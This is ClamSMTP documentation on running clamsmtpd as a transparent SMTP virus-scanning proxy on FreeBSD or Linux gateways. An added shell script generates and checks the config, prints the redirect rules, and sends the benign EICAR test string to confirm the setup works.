ClamSMTP: Transparent Proxying

A transparent proxy grabs a certain type of traffic at your gateway or router and sends it through a proxy without the knowledge of the user or client. This is a short description of how to use ClamSMTP as a transparent proxy for virus checking of SMTP traffic entering or leaving your network.

You should already be familiar with routing and network administration. Those topics are not touched on here.

Note that certain SMTP features are disabled when a session passes through clamsmtpd, most notably SSL/TLS: the proxied hop therefore carries the mail in the clear. Authentication does work. Transparent proxying has only been tested on recent versions of FreeBSD (using ipfw) and Linux (using iptables).

This setup assumes the clamsmtpd proxy is running on the same machine as the gateway. Running it on a different machine is possible, but more complicated to setup.

ClamSMTP Setup

  • Make sure you're using ClamSMTP version 0.8 or later.
  • Enable the TransparentProxy option in the config file. The OutAddress should be removed as the out address will be determined by the original destination of the SMTP connection.
  • Be sure you have enough connections to support all the anticipated SMTP traffic. Use the MaxConnections option to adjust this.
  • The examples below assume clamsmtpd is listening on the default port of 10025.
  • Make sure clamd (the ClamAV daemon) is running and listening on the socket you specified. You set this in clamav.conf with the LocalSocket or TCPSocket directive (uncomment only one of them). Also make sure the ScanMail directive is on.
  • As usual, start clamsmtpd as the same user that runs clamd, usually called clamav.

FreeBSD

Your kernel needs support for ipfw. You can either load this as a kernel module by executing the following:

# kldload ipfw.ko

Or you can build it into your kernel by adding the following lines to your kernel config file. See the FreeBSD Handbook for info on how to build a kernel. Make sure to install and reboot with the new kernel before proceeding.

IPFIREWALL
IPFIREWALL_FORWARD

Make sure IP forwarding (routing) is turned on. It probably already is as transparent proxying happens on a router.

Run the following command. It adds a line to your firewall to route traffic to clamsmtpd.

# ipfw add 100 fwd 127.0.0.1,10025 tcp from not me to any 25

Linux

If your kernel does not contain transparent proxy support you need to recompile it with the following options. Recompiling your Linux kernel is beyond the scope of this document; you can find many tutorials on the subject online. After rebuilding and installing your new kernel, make sure to reboot.

* Under General Setup
    o Networking support
    o Sysctl support
* Under Networking Options
    o Network packet filtering
    o TCP/IP networking
    o Fast switching: *NO*
* Under Networking Options -> IP: Netfilter Configuration
    o Connection tracking
    o IP tables support
    o Full NAT
    o REDIRECT target support
* Under File Systems
    o /proc filesystem support 

Make sure IP forwarding (routing) is turned on. It probably already is as transparent proxying happens on a router.

Run the following command and add it to your boot scripts. Make sure to substitute your NIC name in the command below:

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 25 -j REDIRECT --to-port 10025
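The following script is an added example, not part of the ClamSMTP documentation or the clamsmtp project. It ties the setup steps above together: it generates a transparent-mode clamsmtpd.conf, lints an existing config against the two rules the text insists on (TransparentProxy on, no OutAddress), prints the matching ipfw or iptables redirect rule, and can push the EICAR test string through the gateway from a LAN host to confirm the redirect reaches the scanner. Directive names (Listen, ClamAddress, User) are taken from clamsmtpd.conf(5); the socket path, interface name and port 10025 are assumed defaults, and `lan-host.example.test` and the probe addresses are placeholders.

```shell
#!/bin/sh
# Added example (not part of ClamSMTP). Assumes clamsmtpd.conf(5) directive
# names; paths, interface and port values are placeholders to adjust.

# Emit a transparent-mode clamsmtpd.conf on stdout.
# $1 = listen port, $2 = clamd socket (must match LocalSocket/TCPSocket in
# clamd's config), $3 = MaxConnections. OutAddress is deliberately absent:
# in TransparentProxy mode clamsmtpd takes the destination from the
# redirected connection, and a fixed OutAddress would override it.
gen_transparent_conf() {
    cat <<EOF
# clamsmtpd.conf - transparent proxy mode (generated example)
Listen: 127.0.0.1:$1
TransparentProxy: on
ClamAddress: $2
MaxConnections: $3
User: clamav
EOF
}

# Lint an existing config ($1). Prints each problem found; returns 0 only
# when the file is usable in transparent mode.
check_transparent_conf() {
    rc=0
    if ! grep -Eq '^[[:space:]]*TransparentProxy:[[:space:]]*on' "$1"; then
        echo "TransparentProxy is not on"; rc=1
    fi
    if grep -Eq '^[[:space:]]*OutAddress:' "$1"; then
        echo "OutAddress is set; remove it, it overrides the real destination"; rc=1
    fi
    if ! grep -Eq '^[[:space:]]*ClamAddress:' "$1"; then
        echo "ClamAddress missing; clamsmtpd cannot reach clamd"; rc=1
    fi
    return $rc
}

# Redirect rules for the gateway. The iptables rule catches only traffic
# arriving on the LAN interface ($1): clamsmtpd's own outbound connections
# are locally generated, traverse OUTPUT rather than PREROUTING, and so are
# never looped back into the proxy. $2 = clamsmtpd listen port.
iptables_redirect_rule() {
    echo "iptables -t nat -A PREROUTING -i $1 -p tcp --dport 25 -j REDIRECT --to-port $2"
}
# ipfw equivalent; "not me" excludes the gateway's own (clamsmtpd's) connections.
ipfw_fwd_rule() {
    echo "ipfw add 100 fwd 127.0.0.1,$1 tcp from not me to any 25"
}

# From a LAN host, send the EICAR test string towards an external MTA ($1)
# to a mailbox you control ($2). If the redirect works, the session is
# answered by clamsmtpd and the message is caught; confirm in clamsmtpd's log.
eicar_probe() {
    cat <<EOF | nc -w 10 "$1" 25
EHLO lan-host.example.test
MAIL FROM:<probe@example.test>
RCPT TO:<$2>
DATA
Subject: EICAR transparent-proxy probe

X5O!P%@AP[4\\PZX54(P^)7CC)7}\$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!\$H+H*
.
QUIT
EOF
}

# Usage: conf [port] [socket] [maxconn] | check [file] | rule [iface] [port]
#        ipfw [port] | probe <mta> <recipient>
case "${1:-}" in
    conf)  gen_transparent_conf "${2:-10025}" "${3:-/var/run/clamav/clamd.ctl}" "${4:-64}" ;;
    check) check_transparent_conf "${2:-/etc/clamsmtpd.conf}" ;;
    rule)  iptables_redirect_rule "${2:-eth0}" "${3:-10025}" ;;
    ipfw)  ipfw_fwd_rule "${2:-10025}" ;;
    probe) eicar_probe "$2" "$3" ;;
esac
```

Run `sh proxy.sh check /etc/clamsmtpd.conf` before adding the firewall rule: once the REDIRECT is in place, a leftover OutAddress silently sends every client's mail to one fixed relay instead of its real destination, which is much harder to notice than a refused connection.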

Copyright 2002, N. Nielsen